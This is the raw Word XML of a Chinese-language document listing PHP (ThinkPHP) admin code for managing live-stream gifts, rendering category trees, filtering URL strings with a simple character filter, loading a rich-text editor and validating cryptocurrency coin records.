          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420881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B5BF6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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C6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C6A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51C9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29F7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2A1CF4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$name=Db::name('member_zhibo_liwu')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF02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279E4C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$this-&gt;assign('name',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED5A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2B027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6AEA4B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7184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E66C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$data=$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC4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4A3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F0258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FB88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liwu_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A454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if(request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F91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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E0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6598A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$typeid=Db::name('member_zhibo_liwu')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF887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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78687B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B5AEA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$data=['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB1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C219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3669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提交参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA6D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B115D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42F8B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073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liwu_list(){    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED9B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736F1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$search_name=input('param.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E9E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$search_type=input('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3CD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if($search_name &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49AD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$map[$search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89E7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4849C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E712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966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$db=Db::name('member_zhibo_liwu_list')-&gt;order('id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA42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$data=$db-&gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC996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038DC8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$data[$k]['user'] = _user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CA7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$data[$k]['liwu'] = Db::name('member_zhibo_liwu')-&gt;find($v['liwu_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4FD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9691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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0950E3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$db-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F227C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$this-&gt;assign('page', $page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690594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$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631A3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6A71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39C69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288A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think\Request; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EB5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2399E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gettree($data, $tid,$num=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F84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$num+=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA8B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$nbsp='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ECA8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if($tid!=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBF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$nbsp.=$nbsp.'&amp;nbsp;&amp;nbsp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>┠</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;nbsp;&amp;nbsp';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839F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122821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$html = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2898D0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$hide=array('0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974A2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$hides=array('1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77E6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foreach($data as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF5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if($v['tid'] == $tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8AF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 "\r\n&lt;tr id=\"id".$v['id']."\" class=\"gradeA footable-even category".$num."\"&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F702F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"&lt;td class=\"categoryTitle\"&gt;".$nbsp.$v['id']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE18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"&lt;td class=\"categoryTitle\"&gt;".$nbsp.$v['title']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03C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"&lt;td&gt;".$v['controller']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BF0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"&lt;td&gt;".$v['function']."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B163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"&lt;td&gt;".$hide[$v['hide']]."&lt;/td&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC13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'&lt;td&gt;&lt;div class="btn-group"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461F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'&lt;button data-toggle="dropdown" class="btn btn-primary btn-xs dropdown-toggle"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;span class="caret"&gt;&lt;/span&gt;&lt;/button&gt;&lt;ul class="dropdown-menu"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8291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"&lt;li&gt;&lt;a href=".url('add',['id'=&gt;$v['id']])."&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=".url('hide',['id'=&gt;$v['id']])."&gt;".$hides[$v['hide']]."&lt;/a&gt;&lt;/li&gt;".'&lt;li class="divider"&gt;&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68245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"&lt;li&gt;&lt;a href=\"javascript:;\" onclick=\"del(".$v['id'].")\"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;&lt;/li&gt;&lt;/td&gt;&lt;/tr&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A4A7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 getTree($data, $v['id'],$num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB9E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=$html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C96B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0539A5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0F9061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return $html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCE2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0894F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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字符过滤</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB61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safe_replace($string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CC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str_replace('%20','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F4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str_replace('%27','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BF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str_replace('%2527','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188430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str_replace('*','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2251E0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str_replace('"','&amp;quot;',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F09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str_replace("'",'',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCCA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str_replace('"','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E01F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str_replace(';','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F9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str_replace('&lt;','&amp;lt;',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D374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str_replace('&gt;','&amp;gt;',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B0B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str_replace("{",'',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078B7A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str_replace('}','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1C2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str_replace('\\','',$string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE834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$string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26444F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5B75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category($data, $tid,$selected,$num=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F6C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$num+=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21917F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$nbsp='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB02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$selecteds='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E05A5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if($num!=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F2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for ($i=1; $i &lt;$num ; $i++) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495CBB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$nbsp.='&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058310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100F0F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$nbsp.='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>┠</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;nbsp;&amp;nbsp;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCA7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6F5FD3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$html = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EAF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foreach($data as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A43E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if($v['tid'] == $tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD8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if($selected==$v['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532F97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$selecteds='selected="selected"';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E19C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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DD9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$selecteds='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0DF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1407F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>"\r\n".'&lt;option value="'.$v['id'].'" '.$selecteds.'&gt;'.$nbsp.$v['title'].'&lt;/option&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10226E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 category($data, $v['id'],$selected,$num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5A9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$html </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=$html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C95B2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45DC61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32958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return $html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA178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694D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function get_web_url() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371143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$sys_protocal = isset($_SERVER['SERVER_PORT']) &amp;&amp; $_SERVER['SERVER_PORT'] == '443' ? '' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69B6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$php_self = $_SERVER['PHP_SELF'] ? safe_replace($_SERVER['PHP_SELF']) : safe_replace($_SERVER['SCRIPT_NAME']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8536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$path_info = isset($_SERVER['PATH_INFO']) ? safe_replace($_SERVER['PATH_INFO']) : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079108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$relate_url = isset($_SERVER['REQUEST_URI']) ? safe_replace($_SERVER['REQUEST_URI']) : $php_self.(isset($_SERVER['QUERY_STRING']) ? '?'.safe_replace($_SERVER['QUERY_STRING']) : $path_info);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1F1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$sys_protocal.(isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '').$relate_url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D2F2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BBEC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get_tree_option($data, $tid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A26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$stack = array($tid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7951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 = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B00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$added = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA1D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$options = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D64C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$obj = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433931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$loop = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0436C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$depth = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44057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foreach($data as $node) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D42D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$pid = $node['tid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D14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if(!isset($child[$pid])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7CF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$child[$pid] = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DD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3FC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array_push($child[$pid], $node['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF9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$obj[$node['id']] = $node;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68253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298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while (count($stack) &gt; 0) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D35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$stack[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EA9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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA39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$node = isset($obj[$id]) ? $obj[$id] : null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017170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(isset($child[$id])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4C6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for($i = count($child[$id]) - 1; $i &gt;= 0; $i--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F5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array_unshift($stack, $child[$id][$i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B747C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D10D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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F75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4FF8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 $tid &amp;&amp; $node &amp;&amp; !isset($added[$id])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EF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$node['depth'] = $depth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0320BD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$options[] = $node;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A005E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$added[$id] = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B318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5C0D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if($flag == true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24782C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$depth++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314494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F0DE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if($node) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A0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 ($i = count($child[$node['tid']]) - 1; $i &gt;= 0; $i--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD1A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($child[$node['tid']][$i] == $id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55010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array_splice($child[$node['tid']], $i, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228488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16251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EEAA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621E8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if(count($child[$node['tid']]) == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4D8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$child[$node['tid']] = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E7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$depth--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0FD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0A87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FE07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array_shift($stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E14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04A5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$loop++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48F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if($loop &gt; 5000) return $options;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F15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E84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unset($child);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77196E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unset($obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C280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$options;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4A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0A13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ueditor($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE1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if(!$name){$name='content';}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A94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$html='&lt;script type="text/javascript" charset="utf-8" src="__PLUGINS__ueditor/ueditor.config.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608FC8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$html.='&lt;script type="text/javascript" charset="utf-8" src="__PLUGINS__ueditor/ueditor.all.min.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070768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$html.='&lt;script type="text/javascript" src="__PLUGINS__ueditor/lang/zh-cn/zh-cn.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42528D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$html.='&lt;script type="text/javascript"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A4C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if(is_array($name))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8A1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foreach($name as $n) { $html.="var ue=UE.getEditor('".$n."');"; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704787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32440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$html.="var ue=UE.getEditor('".$name."');";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE4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$html.='&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF4F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return $html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56174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6A728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_payType($id,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C333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$data=Db::name('pay')-&gt;where(['id'=&gt;$id])-&gt;cache(true)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94C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$data['type'].$data['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A143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F9EB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7C3C5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app\admin\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7864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71B8F2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Coin extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F433C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16F30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11A91B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'currency|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>币名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F829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'fullname|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49D6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'fullname_zh|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中文全称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2C8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'white_paper|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白皮书</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'url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2AC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'block_url|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区块地址</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'url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C29B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'official_website|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网</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'url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77029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'exchange_num|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上架交易所数量</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'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F90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'circulation|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
